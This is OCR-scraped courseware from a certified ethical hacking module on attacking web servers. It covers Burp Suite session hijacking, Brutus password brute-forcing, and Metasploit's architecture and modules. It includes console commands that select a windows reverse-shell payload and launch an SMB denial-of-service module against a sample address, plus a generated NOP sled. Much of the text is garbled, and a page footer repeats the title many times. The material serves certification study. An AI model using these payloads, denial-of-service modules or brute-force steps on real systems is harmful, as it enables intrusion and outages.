I Accept: tr x t/ j« v o 3 c c ip c , t e x t/ h tn L , «pp Li.Cflt.ion/1
te
xrol, tex t/x m l,

I : ‫| ]׳ ־‬

| 0 matches

http ://p o rtsw ig g er. n et
Note: For complete coverage of Session Hijacking concepts and techniques refer to Module 11: Session Hijacking
Copyright © by EG-Gtltncil. All Rights Reserved. Reproduction is Strictly Prohibited.

W e b
1

1

S e r v e r A t t a c k M e t h o d o lo g y : S e s s io n H ija c k in g

Session hijacking is possible once the current session of the client is identified.

Complete control of the user session can be taken over by the attacker once the user
establishes authentication with the server. W ith the help of sequence number prediction tools,
attackers perform session hijacking. The attacker, after identifying the open session, predicts
the sequence number of the next packet and then sends the data packets before the
legitimate user sends the response with the correct sequence number. Thus, an attacker
performs session hijacking. In addition to this technique, you can also use other session
hijacking techniques such as session fixation, session sidejacking, cross-site scripting, etc. to
capture valid session cookies and IDs. Various tools used for session hijacking include Burp
Suite, Hamster, Firesheep, etc.

Burp Suite
___Source: http://portswigger.net
Burp Suite is an integrated platform for performing security testing of web applications. Its
various tools work seamlessly together to support the entire testing process, from initial
mapping and analysis of an application's attack surface, through to finding and exploiting
security vulnerabilities. The key components of Burp Suite include proxy, scanner, intruder
tool, repeater tool, sequencer tool, etc.

Module 12 Page 1650

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

0- ^ 1 ‫־‬

burp suite free edition v1.4.01

x

burp intruder repeater window about
target

spider  scanner [ intruder | repealer [‫ ־‬sequencer | decoder [ comparer [ options | alerts

site map  scope |
Filter hiding not found items; hiding CSS, image and general binary content hiding 4xx responses; hiding empty folders

*‫ ־‬http7/economictimes indiatimes.com
9 http://edition.cnn.com

0□
‫. ־‬el(
D‫׳‬
o 2]20
-

host

method
GET

□

URL

params status

20
0

1element/ssi/ads.iframes/

length I MIME tj
typi
676
HTM L

□

http: ‫׳‬edition.cnn.com .element
add item to scope
spider this branch
actively scan this branch

O CDBU
O D cn
0‫ □ ־‬E L I

0 O eu
‫־‬

passively scan this branch
engagement tools [pro version only] ►
compare site maps
expand branch

sponse

expand requested Items

M‫']־‬

delete branch

T

request

params ■headers | hex |
'

/ . e le r o e n c / 3 3 i/ in c l/ b r e a k in g _ n e v s / 3 . O / b a n n e r. h c m l? c s iID = c s il

copy URLs In this branch
copy links in this branch
* ‫ ־‬L J SH

T P / 1 .1
3c:

save selected Items

c lc o / :0 1 0 0 i0 1

e d ic io n .c n n .c o m

e r- A g e n c:
A ccep C :

H o z illa / 5 .0

( W in d o w s

NT

6 .2 ;

W O W 64;

c v :i5 .0 )

F i r e f o x / 1 5 .0 .1

c e x c / ja v M c r lp c ,

c e x c / h c m l,

a p p llc a C lo n / x m l,

c e x c / x n il.

FIGURE 1 2 .1 9 : B u rp S u ite S c re e n s h o t

Module 12 Page 1651

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

W e b s e r v e r A tta c k M e th o d o lo g y :
H a c k in g W e b P a s s w o r d s
Brutus - AET2 - www.hoobie.net/brutus - (January 2000)

Use password cracking
techniques such as brute
force attack, dictionary

File

lo o ls

Target

1~ I ‫ם‬

x

Help

|10.0017|

Type I HTTP (Basic Auth)

attack, password guessing to
crack W ebserver passwords
Use tools such as Brutus,

▼|

Start | Stop | Deaf |

Connection Options

HTTP (Basic) Options

THC-Hydra, etc.

Method

| HEAD

r

10 Timeout 1" j -

Connections *‫ ־‬J~
"

Use Proxy

Define

W KeepAlive

]▼J

Authentication Options
W Use Username
User File

Sngle User

useistxt

Pass Mode |Word List
Browse |

File

| words.txt

Positive Authentication Results
Target
10.0 0 1 7 /
10.0 0 1 7 /

_U ype
HTTP (Basic Auth)
HTTP (Basic Auth)

I Username
admin
backup

I Password
academic

Located and nstaled 1 authentication plugns
Imtialisng...
Target 10.0 0 1 7 venfied
Opened user fie containing 6 users
Opened password fie conta*wvg 818 Passwords
Mawmum number of authentication attempts vul be 4908
Engagng target 10.0.017 with HTTP (Basic AuthJ
T n■ i •irofrt amo
irw

Timeout

Reject

AuthSeq

Throttle Quick Kill

h ttp ://w w w . hoobie. n et
Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W e b

S e rve r

A tta c k

M e th o d o lo g y :

H a c k in g

W e b

P a ssw o rd s
One of the main tasks of any attacker is password hacking. By hacking a password, the attacker
gains complete control over the web server. Various methods used by attackers for password
hacking include password guessing, dictionary attacks, brute force attacks, hybrid attacks,
syllable attacsk, precomputed hashes, rule-based attacks, distributed network attacks,
rainbow attacks, etc. Password cracking can also be performed with the help of tools such as
Brutus, THC-Hydra, etc.

O :‫כב‬
1

Brutus
Source: http://www.hoobie.net

Brutus is an online or remote password cracking tools. Attackers use this tool for hacking web
passwords without the knowledge of the victim. The features of the Brutus tool are been
explained briefly on the following slide.

Module 12 Page 1652

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Brutus - AET2 ‫ ־‬www.hoobie.net/brutus ‫( ־‬January 2000)
F i le

Jo o ls

T a rg e t

_

‫ם‬

H e lp

|1 0 .0 .0 .1 7|

T y p e | H T T P ( B a s i c A u (h )

▼~|

S ta r(

j

S to p

C le ar

C o n n e c tio n O p tio n s
P o rt

10

1
80

T im e o u t

10

r T

r

U s e P ro x y

D e fin e

H T T P (B a s ic ) O p tio n s
M e th o d

W

[H E A D

K e e p A liv e

A u th e n tic a tio n O p tio n s—
U s e U se rn a m e
U s e r F ile

I-

S in g le U s e r

Pass M ode

users.txt

B ro w s e

f
B ro w s e

P a s s File

P o s itiv e A u th e n tic a tio n R e s u lts

T
ype

U sern am e

P a ssw o rd

1 .0 .1 /
0 .0 7

T arg e t

H T T P (B a s ic A u th )

ad m in

a c a d e m ic

1 0 .0 .0 .1 7 /

H T T P (B a s ic A u th )

b ackup

L o c a t e d a n d installed 1 a u th e n tic a tio n plug-ins

a

Initialising...
T a r g e t 1 0 .0 .0 .1 7 verifie d
O p e n e d u se r file c o n ta in in g 6 users.
O p e n e d p a s s w o r d file c o n ta in in g 8 1 8 P a s s w o r d s .
M ax im um n u m b e r of a u th e n tic a tio n atte m p ts will b e 4 9 0 8
E n g a g in g ta rg e t 1 0 .0 .0 .1 7 w ith H T T P ( B a s i c A u th )
T rm «n 1

-

a r Jr r .1►
‫•־‬

T im e o u t

R e je c t

A u th S e q

T h ro ttle

Q u ic k Kill

FIGURE 1 2 .2 0 : B ru tu s S c re e n s h o t

Module 12 Page 1653

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

M o d u le F low

C EH

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

M o d u le F lo w
The tools intended for monitoring and managing the web server can also be used by
attackers for malicious purposes. In this day and age, attackers are implementing various
methods to hack web servers. Attackers with minimal knowledge about hacking usually use
s for hacking web servers.

Webserver Concepts

Webserver Attacks

Webserver Attack Tools

Attack Methodology
0
Webserver Pen Testing

-y

Patch M anagement

Webserver Security Tools

o
m
—
m
—

Counter-measures

This section lists and describes various web server attack tools.

Module 12 Page 1654

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Webserver Attack Tools:
Metasploit
The Metasploit Framework is a penetration testing to o lkit, exploit development platform, and research tool
that includes hundreds of working remote exploits for a variety of platforms
It supports fully automated exploitation of web servers, by abusing known vulnerabilities and leveraging weak
passwords via Telnet, SSH, HTTP, and SNM

® ‫״‬jet
(J)metasploit
ft

V ModutM

Tag*

Q

Atporto

‫־‬

T a li 0

wm
Target Syitttn Statu*

• MOkom**4
• I S—
md
•

I

O ptrabng Sy*t»rm (Top »)

• U M olW oM
cm M
• M m
• MKnaPnw

LOOM

PTOftCt Activity (24 Noun)

N ctw oft S n v K t i (Top S)

• 2tC DCIW C
• III M S K M tt
• )7 HETBOSS***(**

• n usn«‫׳‬us(B vv^

•

M USAOPSffwctt

h ttp ://w w w .m eta sp lo it.c o m
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited

W e b

S e r v e r A t t a c k T o o ls : M e t a s p lo it

Source: http://www.metasploit.com
The Metasploit framework makes discovering, exploiting, and sharing vulnerabilities quick and
relatively painless. It enables users to identify, assess, and exploit vulnerable web applications.
Using VPN pivoting, you can run the NeXpose vulnerability scanner through the compromised
web server to discover an exploitable vulnerability in a database that hosts confidential
customer data and employee information. Your team members can then leverage the data
gained to conduct social engineering in the form of a targeted phishing campaign, opening up
new attack vectors on the internal network, which are immediately visible to the entire team.
Finally, you generate executive and audit reports based on the corporate template to enable
your organization to mitigate the attacks and remain compliant with Sarbanes Oxley, HIPAA, or
PCI DSS.
Metasploit enables teams of penetration testers to coordinate orchestrated attacks against
target systems and for team leads to manage project access on a per-user basis. In addition,
Metasploit includes customizable reporting.
M etasploit enables you to:
©

Complete penetration test assignments faster by automating repetitive tasks and
leveraging multi-level attacks

Module 12 Page 1655

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

© Assess the security of web applications, network and endpoint systems, as well as email
users
©

Emulate realistic network attacks based on the leading Metasploit framework with more
than one million unique downloads in the past year

© Test with the world's largest public database of quality assured exploits
© Tunnel any traffic through compromised targets to pivot deeper into the network
©

Collaborate more effectively with team members in concerted network tests

©

Customize the content and template of executive, audit, and technical reports

(J metasploit
l« M lp n O

l

S*M *o«W 0

Targ et S y s te m S U M S

Tag*

V Cwnpognt

O R rpo rtt

~

TmJ‫ ״‬Q

O p eratin g S y s te m s [T o p » )

• M onN nocm
H M
•

M O n to x M

• 1■SmM

• 2 •Konca P m t r

•

• 2 •*0‫ וו״0*ף‬ffntwHM

1 •loom)

• 1 •HP ***ClOOtO

Protect Activity (24 Hours)

Ntwr Services (Top ‫)צ‬
e ok
•
•
•
•
•

270 DCERPC Server*
114 •SMB STOKT*
37-N€TBOSSr<vcr*
» ‫־‬MS‫ ׳‬W ‫״‬
T
*S(RV S^vcr*
20 USAO? Serve**

FIGURE 1 2 .2 1 : M e ta s p lo it S c re e n s h o t

Module 12 Page 1656

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

M etasploit A rchitecture

C EH
(•rtifwtf

I til1 1 Nm Im
(4

Rex
Custom plug-ins

^

F ra m e w o rk -B a s e

^

A

k"

:
In te rfa c e s
m fs c o n s o le
m s fc li
m s fw e b

P rotocol Tools

F ra m e w o rk -C o re

K

7
S e c u rity Tools

M o d u le s

‫ץ‬

E xp lo its
P ayload s

W e b S ervices
E ncoders
In te g ra tio n

m s fw x

NOPS

m s fa p i

A u x ilia ry

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

M e t a s p lo it A r c h ite c tu r e
The Metasploit framework is an open-source exploitation framework that is designed
to provide security researchers and pen testers with a uniform model for rapid development of
exploits, payloads, encoders, NOP generators, and reconnaissance tools. The framework
provides the ability to reuse large chunks of code that would otherwise have to be copied or
reimplemented on a per-exploit basis. The framework was designed to be as modular as
possible in order to encourage the reuse of code across various projects. The framework itself
is broken down into a few different pieces, the most low-level being the framework core. The
framework core is responsible for implementing all of the required interfaces that allow for
interacting with exploit modules, sessions, and plugins. It supports vulnerability research,
exploit development, and the creation of custom security tools.

Module 12 Page 1657

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Libraries

‫ץ‬

A
Rex
Custom plug-ins <
^

:‫<־‬

/

Protocol Tools

Framework-Core
Framework-Base

^

<•:

Interfaces
mfsconsole
msfcli
msfweb

Modules
Security Tools
Web Services
Integration



Exploits
Payloads
Encoders

msfwx

NOPS

msfapi

Auxiliary

FIGURE 1 2 .2 2 : M e ta s p lo it A rc h ite c tu re

Module 12 Page 1658

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

M etasploit Exploit M odule

C EH

It is the basic module in Metasploit used to encapsulate an exploit using which users target many platforms with a single exploit
This module comes with simplified meta-information fields
Using a Mixins feature, users can also modify exploit behavior dynamically, brute force attacks, and attempt passive exploits

S te p s t o e x p lo it a s y s te m f o l l o w t h e M e t a s p lo it F r a m e w o r k

C o n fig u r in g A c tiv e E x p lo it

_

S e le c tin g a T a rg e t

*

&
Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

M e t a s p lo it E x p lo it M o d u le
- 1 1 1 ii

The exploit module is the basic module in Metasploit used to encapsulate an exploit

using which users target many platforms with a single exploit. This module comes with
simplified meta-information fields. Using a Mixins feature, users can also modify exploit
behavior dynamically, perform brute force attacks, and attempt passive exploits.
Following are the steps to exploit a system using the Metasploit framework:
©

Configuring Active Exploit

© Verifying the Exploit Options
©

Selecting a Target

©

Selecting the Payload

©

Launching the Exploit

Module 12 Page 1659

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

M etasploit Payload M odule
j

Payload module establishes a com m unication channel between the M etasploit fram ew ork and the victim host

J

It combines the arbitrary code tha t is executed as the result o f an exploit succeeding

J

To generate payloads, first select a payload using the command:

9S

C o m m a n d P ro m p t

m sf

>

m sf

p a y lo a d (3 h e ll_ r e v e r s e _ tc p )

use

U sage:

w in d o w s / s h e ll_ r e v e r s e _ t c p

g e n e ra te

G e n e ra te s

a

>

g e n e ra te

-h

[o p t io n s ]

p a y lo a d .

-b

< o p t>

The

l i s t

o f

c h a ra c te rs to

-e

< o p t>

The

nam e

o f

th e

-h

H e lp

-o

< o p t>

a v o id :
m o d u le

,  x 0 0  x ff'
to

u s e .

b an n e r.
A

com m a

VAR=VAL

s e p a ra te d

< o p t>

NOP

s le d

-t

< o p t>

The

o u tp u t

p a y lo a d (s h e ll

l i s t

o f

o p t io n s

in

fo rm a t.

-s

m sf

en cod er

le n g t h .
ty p e :

re v e rs e

tc p )

ru b y ,

p e r i,

c ,

o r

ra w .

>

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

M e t a s p lo it P a y lo a d M o d u le
The Metasploit payload module offers shellcode that can perform a number of
interesting tasks for an attacker. A payload is a piece of software that lets you control a
computer system after its been exploited. The payload is typically attached to and delivered
by the exploit. An exploit carries the payload in its backpack when it break into the system and
then leaves the backpack there.
With the help of payload, you can upload and download files from the system, take
screenshots, and collect password hashes. You can even take over the screen, mouse, and
keyboard to fully control the computer.
To generate payloads, first select a payload using the command:

Module 12 Page 1660

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

;

Exam 312-50 Certified Ethical Hacker

C om m and P ro m p t
msf > use windows/shell reverse tcp
msf payload(shell_reverse_tcp) > generate -h
Usage: generate [options]
Generates a payload.
O P T IO N S :

-b <opt>

The listof characters

to avoid:,x00xff'

-e <opt>

The nameof the encoder module to use.

-h Help banner.
-o <opt> A comma separated list of options in
VAR=VAL format.
-s <opt>

NOP sled

length.

-t <opt>

The output type: ruby,

peri, c, or raw.

msf payload(shell reverse tcp) >

FIGURE 1 2 .2 3 : M e ta s p lo it P a ylo a d M o d u le

Module 12 Page 1661

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Metasploit Auxiliary Module
J

CEH

M e ta s p lo it's a u x ilia ry m o d u le s can b e u s e d t o p e r fo r m a r b it r a r y , o n e o f f a c tio n s su ch as p o r t s c a n n in g , d e n ia l o f s e rv ic e , a n d e v e n fu z z in g

J

To ru n a u x ilia ry m o d u le , e ith e r use th e

run c o m m a n d ,

o r use th e

e x p l o i t com m and

C o m m a n d P ro m p t

m s f

>

m s f

a u x ilia r y (m

R H O ST
m s f
[ * ]

u s e

=>

d o s / w in d o w s / s m b / m s 0 6 _ 0 3 5 _ m a ils lo t
s 0 6 _ 0 3 5 _ m

a ils lo t )

>

a ils lo t )

>

s e t

R H O ST

1 . 2 . 3 . 4

1 . 2 . 3 . 4

a u x ilia r y (m
M a n g lin g

s 0 6 _ 0 3 5 _ m

t h e

k e r n e l,

tw o

b y t e s

r u n
a t

a

t i m e . . .

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

M e t a s p lo it A u x ilia r y M o d u le
Metasploit's auxiliary modules can be used to perform arbitrary, one-off actions such
as port scanning, denial of service, and even fuzzing. To run auxiliary module, either use the run
command or use the exploit command.

Module 12 Page 1662

Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Metasploit NOPS Module

C EH
(•rtifwtf

I til1(41 Nm Im

NOP modules generate a no-operation instructions used fo r blocking o u t buffers
Use g e n e r a t e

com m and to generate a NOP sled o f an arbitrary size and display it in a given form at

OPTIONS:
- b < o p t> :

The list of characters to avoid: 'x00xff'

- h : Help banner.
- s < o p t> : The comma separated list of registers to save.
- t

< o p t> :

The output type: ruby, peri, c, or raw

m sf n o p (o p ty 2 )>
To generate a 50 byte NOP sled that is displayed as a
C-style buffer, run the following command:

Generates a NOP sled of a given length

&

□

Comm and P rom pt

C om m and P rom pt
m sf

m s f

>

u s e

x 8 6 / o p ty 2

m s f

n o p (o p ty 2 )

>

g e n e r a t e

n o p (o p ty 2 )

u n s ig n e d

char

> g e n e ra te
b u f []

- t

c

50

—

" x f 5 x 3 d x 0 5 x l5 x f8 x 6 7 x b a x 7 d x 0 8 x d 6 x 6

- h

6 x 9 f x b 8 x 2 d x b 6 "
U s a g e :

g e n e r a t e

[o p t io n s ]

le n g t h

M x 2 4  x b e  x b l  x 3 f  x 4 3  x l d  x 9 3  x b 2  x 3 7  x 3 5  x 8
4 x d 5 x l4 x 4 0 x b 4 "
‫ ״‬x b 3 x 4 1 x b 9 x 4 8 x 0 4 x 9 9 x 4 6 x a 9 x b 0 x b 7 x 2
f x fd x 9 6 x 4 a x 9 8 "
nx 9 2 x b 5 x d 4 x 4 fx 9 1 " ;
m sf n o p (o p ty 2 )

>

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

M e t a s p lo it N O P S M o d u le
Metasploit NOP modules are used to generate no operation instructions that can be
used for padding out buffers. The NOP module console interface supports generating a NOP
sled of an arbitrary size and displaying it in a given format.
options:

-b <opt>

The list of characters to avoid: ?x00xff?

-h

Help banner.

-s <opt>

The comma separated

list of registers to save.

-t <opt>

The output type: ruby,

peri, c, or raw.

G e n e r a te s a NOP sled of a given length

Module 12 Page 1663

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

To g e n e r a te a 5 0-byte NOP sled t h a t is displayed as a C-style buffer, run t h e following
com m and:

msf nop(opty2) > generate -t c 50
unsigned char buf[] =
"xf5x3dx05xl5xf8x67xbax7dx08xd6x6
6x9fxb8x2dxb6"
"x24xbexblx3fx43xldx93xb2x37x35x8
4xd5xl4x40xb4"
"xb3x41xb9x48x04x99x46xa9xb0xb7x2
fxfdx96x4ax98"
"x92xb5xd4x4fx91";
msf nop(opty2) >
F ig u re 1 2 .2 5 : M e ta s p lo it NOPS M o d u le

Module 12 Page 1664

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

Webserver Attack Tools: Wfetch I CEH
WFetch allows attacker to fully customize an HTTP request and send it to a Web server to see the raw HTTP request and
response data
It allows attacker to test the performance of Web sites that contain new elements such as Active Server Pages (ASP) or
wireless protocols

wfeicfi - wtetcni
File

Edit

View

Window

Help

f l
Verb: [GET

Advanced Request:

‫ ■ י‬host [localHost
|

f Di«abled

Path Y
Authentcation
Anoryraam

UxrtecfcOT
Cornsct
Qphcr

dctajt

U«er;

Ckertooc.: r w *

Pogtwd:

r

l_ C 0 J

NKp

Qoirah.

fifth.

I- from file

A
-d

P«c5y

!race

J J
|60

P

Reu«

Log Output [Last Status: 500 Internal Server Error;
£> started....
O Puny: WWWConnect::Close(” ","8<
© closed source port: 7i98rn
© MfVWConnectiConriectriocaihost" ~80')n
Q IP = "|::l].Q0"n____________________________

h ttp ://w w w .m icro so ft.co m
Copyright © by EG-G(l1ncil. All Rights Reserved. Reproduction is Strictly Prohibited.

W e b

S e r v e r A t t a c k T o o ls : W f e t c h

Source: http://www.microsoft.com
Wfetch is a graphical user-interface aimed at helping customers resolve problems related to
the browser interaction with Microsoft's IIS web server. It allows a client to reproduce a
problem with a lightweight, very HTTP-friendly test environment. It allows for very granular
testing down to the authentication, authorization, custom headers, and much more.

Module 12 Page 1665

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

w fetch ‫ ־‬W fe tc h l
£1
le £d!t yiew

Window

Help

i) O £ &
W fe tc h l
y » |GET
e t>

Host |k> >
ca»x *

S S ■

j.jEort |drfa‫ »״‬j-JVcr |1 1

Advanced Request

Disabled

T ] < fromHe
‫־־‬

Palh: |/
.jthertcaboo
Aulh

l/Vionymoos

Connection
Connect

http
d etai

Coman |

Cipher

User

-]

Ckentcert none

|

Pajiwd |

r

Projy Igproxy

Go' |

^ J2 I

_>
J
^80

Tracso--R? Raw

rSocket
P Reuse

Log Output [Last Status: S00 Internal Server Error]
‫►־‬started....
O Proxy; WWWConnect::Close(” ,"80")n
£ closed source port 7398rn
4 ) WWWConnect::ConnectClocalhost".8‫<״‬r)n
0 > ‫־08:[1::]־‬n
=

NUM

Ready

F ig u re 1 2 .2 6 : W fe tc h S c re e n s h o t

Module 12 Page 1666

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

W e b

Exam 312-50 Certified Ethical Hacker

P a s s w o r d C r a c k in g T o o l: B r u t u s

Source: http://www.hoobie.net
Brutus is a remote password cracker's tool. It is available for Windows 9x, NT. and 2000, there
is no UNIX version available, although it is a possibility at some point in the future. Brutus was
written originally to help check routers for default and common passwords.
Features
Q

HTTP (Basic Authentication)

e

HTTP (HTML Form/CGI)

e

POP3

e

FTP

e

SM B

Q

Telnet

Q

Multi-stage authentication engine

©

No user name, single user name, and multiple user name modes

0

Password list, combo (user/password) list and configurable brute force modes

Module 12 Page 1667

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Hacking Webservers

Exam 312-50 Certified Ethical Hacker

©

Highly customizable authentication sequences

©

Load and resume position

©

Import and Export custom authentication types as BAD files seamlessly

Q

SOCKS proxy support for all authentication types

0

User and password list generation and manipulation functionality

©

HTML Form interpretation for HTML Form/CGI authentication types

0

Error handling and recovery capability inc. resume after crash/failure

B ru tu s - AET2 ‫ ־‬w w w .h o o b ie .n e t/b ru tu s - (Ja nuary 2 0 0 0 )
Eile

Iools

Target

I 1 ‫ם . ־־‬

*

Help

[10001 ^

Type |HTTP (Basic Auth) j* J

Start

C le a

Connection Options
Port [80

*

‫(־‬

Connections 0‫י‬

Tmeout

rj‫־‬

10 ‫ך־ך־‬

r

U**Ptoxy

Drinc |

HTTP (Basic) Options
Method |HEAD

]» ]

&KeepAJrve

Authentication Options

W Username
Use

I- Single Usei

Use» Fte ]users txt

Pass Mode |W 0»d List
Btome |

pjg

[words bd

Browse |

Positive Authentication Results
Target
100017/
100017/

HTTP (Basic Auth)
HTTP (Basic Auth)

Username
adrran
backup

Password
academ ic

Located and installed 1 authentication ptug-ns
Iniiafeng.
Target 10.0.0.17 verified
Opened user file contamng 6 users
Opened password file containing 818 Passwords
Maximum number of authentication attempts w J be 4906
Engagng target 10.0.0.17 with HTTP (Basic Auth)
T mws<1 »1 w i w
»

Throttle

F ig u re 1 2 .2 7 : B ru tu s S c re e n s h o t

Module 12 Page 1668

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers
Ce hv8 module 12 hacking webservers

Más contenido relacionado

Destacado

Ce hv8 module 03 scanning networks
Ce hv8 module 03 scanning networksCe hv8 module 03 scanning networks
Ce hv8 module 03 scanning networksMehrdad Jingoism
 
Ce hv8 module 10 denial of service
Ce hv8 module 10 denial of serviceCe hv8 module 10 denial of service
Ce hv8 module 10 denial of serviceMehrdad Jingoism
 
Ce hv8 module 09 social engineering
Ce hv8 module 09 social engineeringCe hv8 module 09 social engineering
Ce hv8 module 09 social engineeringMehrdad Jingoism
 
Ce hv8 module 11 session hijacking
Ce hv8 module 11 session hijackingCe hv8 module 11 session hijacking
Ce hv8 module 11 session hijackingMehrdad Jingoism
 
Ce hv8 module 02 footprinting and reconnaissance
Ce hv8 module 02 footprinting and reconnaissanceCe hv8 module 02 footprinting and reconnaissance
Ce hv8 module 02 footprinting and reconnaissanceMehrdad Jingoism
 
Ce hv8 module 06 trojans and backdoors
Ce hv8 module 06 trojans and backdoorsCe hv8 module 06 trojans and backdoors
Ce hv8 module 06 trojans and backdoorsMehrdad Jingoism
 
Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking Ce hv8 module 05 system hacking
Ce hv8 module 05 system hacking Mehrdad Jingoism
 
Ce hv8 module 07 viruses and worms
Ce hv8 module 07 viruses and wormsCe hv8 module 07 viruses and worms
Ce hv8 module 07 viruses and wormsMehrdad Jingoism
 
Ce hv8 module 04 enumeration
Ce hv8 module 04 enumerationCe hv8 module 04 enumeration
Ce hv8 module 04 enumerationMehrdad Jingoism
 
Ce hv8 module 19 cryptography
Ce hv8 module 19 cryptographyCe hv8 module 19 cryptography
Ce hv8 module 19 cryptographyMehrdad Jingoism
 
Ce hv8 module 20 penetration testing
Ce hv8 module 20 penetration testingCe hv8 module 20 penetration testing
Ce hv8 module 20 penetration testingMehrdad Jingoism
 
Ceh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsCeh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsMehrdad Jingoism
 
Ceh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissanceCeh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissanceMehrdad Jingoism
 
Ceh v8 labs module 19 cryptography
Ceh v8 labs module 19 cryptographyCeh v8 labs module 19 cryptography
